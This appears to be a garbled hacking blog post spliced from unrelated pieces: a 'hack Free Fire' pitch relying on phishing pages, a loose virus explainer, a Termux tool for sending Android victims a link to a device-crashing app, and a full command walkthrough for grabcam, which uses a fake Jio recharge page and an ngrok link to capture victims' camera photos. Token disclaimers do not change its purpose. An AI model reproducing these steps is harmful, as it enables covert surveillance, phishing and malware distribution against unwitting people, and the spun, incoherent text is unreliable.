Hi guys’ if you are searching for how to hack free fire and searching for the best article to get the best explanation about how to hack free fire. Then you are at the right place.
Today I’m here going to share the step by step tutorial about “hacking free fire “. By this article, you can get a lot of about what is free fire, can we hack free fire, how to hack free fire. And I’m damn sure that you will never get all these unique information like us on the internet anywhere else.
Free fire is a battle royale game in which 60 players will be dropped to the battleground and everyone gets a different kind of weapon and supplies and only one can be won this when he kills all 59 members like this the game works.
yes, but you need some knowledge about programming and server handling to hack any game like pubg free fire and lot more. But still, you can hack these games with the help of phishing pages which I used in the practical video.
In this post I am going to introduce you with Virus. You all would be knowing about virus but you might not be knowing how harmful it could be. In this lesson I am going to tell you about it and how to create a virus.
Virus stands for Vital Information Resource Under Siege.
You all would be knowing about virus but you might not be knowing how harmful it could be. In this lesson I am going to tell you about it and how to create a virus.
The function of Virus is similar to what it stands for. Virus is nothing but a piece of code. This code, once executed, starts performing tasks in the background.
Some viruses will use up all the computing power to perform a job. It can be a simple job of pinging “google.com” for no apparent reason. Due to this, the victim’s machine performs very slow as majority of its resources are being used by the Virus.
A victim may not understand its existence right at the beginning. But as time progresses, various symptoms of Virus Infection can be seen such as slowness.
These symptoms vary as the code variation occurs.
A Virus’ damage increases as it spreads to other disks and drives. However, it always needs to attach itself to a host file or an application to spread. Say, you downloaded subtitles of a movie, and along with the usual .srt file, there is a fishy .bat file as well.
A victim might not pay much attention to it and give a copy of the same to another person.
In this way, even if the victim deletes it from one of the drives, say C drive, there is a copy of it somewhere else.
The concealer’s job is to make Virus appear as a benign application i.e a trust-worthy and genuine application.
This part is normally done by the attacker during the creation of the virus itself.
A simple way is to show another app’s icon as its own.
This way the victim is fooled to believe that it is a trust-worthy file.
In the previous sub-topic, we saw how a chain of propagation was created.
This plan is devised by the Replicator part of a Virus.
It may not be limited to only file systems but can be applied to networks and internet as well.
How to send a virus or spread the virus from simply sending the link in an android gadget
So sending viruses and getting to gadgets isn’t simple these days yet at the same time, we can misuse huge numbers of the gadgets by this instrument named Infect which is comprised of slam scripting language so this content is accessible for termux clients you can run this device in established and non-established gadgets.
So fellow’s today we are going to spread a virus through simply link and parcel more…
Now after tool opens in that you will get 4 option’s
Infect now, from this feature you’ll get a link and send that link to your victim and when your victim installs that app his/her device will crash and lot more.
Save now, from this you’ll get a link of antivirus type app which removes that virus from his/her device
Update script, from this you’ll update script.
Exit, exit from script.
Note
Make sure that whatever you are doing is only for educational purposes and nothing else if you are doing any illegal activity then we are not responsible for that.
grabcam is a bash based script which is officially made for termux from this tool can hack you victims camera by simple offer page. This tool works on both rooted Android device and Non-rooted Android device.
Well it have hurt the privacy of victim so here is a disclaimer. Use it only for fun and educational purpose. Don’t use to harm or take revenge.
Now I will give you instructions to install this tool.
Now open Termux and write the following command one by one.
apt update && apt install
pkg install python python2 vim figlet curl
pkg install php
pip2 install lolcat
pkg install git
git clone https://github.com/noob-hackers/grabcam
ls
cd grabcam
ls
bash grabcam.sh
Remember
Termux is case sensitive. So be very careful while writing the commands.
Now you will see this image which is on your right side if you have successfully completed all the previous steps.
But if not it might be some syntax error so just repeat the steps form starting and you will reach here.
And if you get any problem just contact me.
Give me screenshot of the terminal and i will surely help you out.
Not after this lets just try to create a link and send it to our victim.
We will do it by ngrok remember we install in our previous lecture.
Write 2 and press enter
You will see it will start installating automatically. Just keep in mind to turn on hotspot because there is a bug in ngork and will not generate link until to open hotspot.
Now copy the direct link which is generated and send it to victim.
Remember don’t turn close termux from recent app and don’t turn your hotspot off.
Now as soon as victim open the link it will ask permission for him to acess his camera and it will start sending pictures of your victim to you.
And victim will see fake jio recharge script.
Now open termux and you will see [+] cam file recieved! in your terminal. It will send you pictures until you turn it off. To do so write
ctrl+c
Now in order to see the files received write
ls
You will see the files appear there.
Now we have to move these files to our
storage. To do so write the move command
as shown below.
mv filename.png /sdcard
Remember you have to write the file name received exactly same so i will suggest you to copy the name and paste it one after another.
Or you can move them in bulk
mv file1.png file2.png file3.png /sdcard
Now type
ls
You will see files are not there it means
they are moved in sdcard.
Now open your file manager and you will see
your victims picture there.
So enjoy and if you like our post Don’t forget to share with your friends and family and let us know in the comments section.
So folks a debt of gratitude is in order for visiting our blog. I trust you discover our article “termux metasploit pack mistake arrangement” supportive for you kindly offer and remark your idea about this article and continue visiting to get hacking and gaming and parcel more devices and news for nothing. much obliged to you!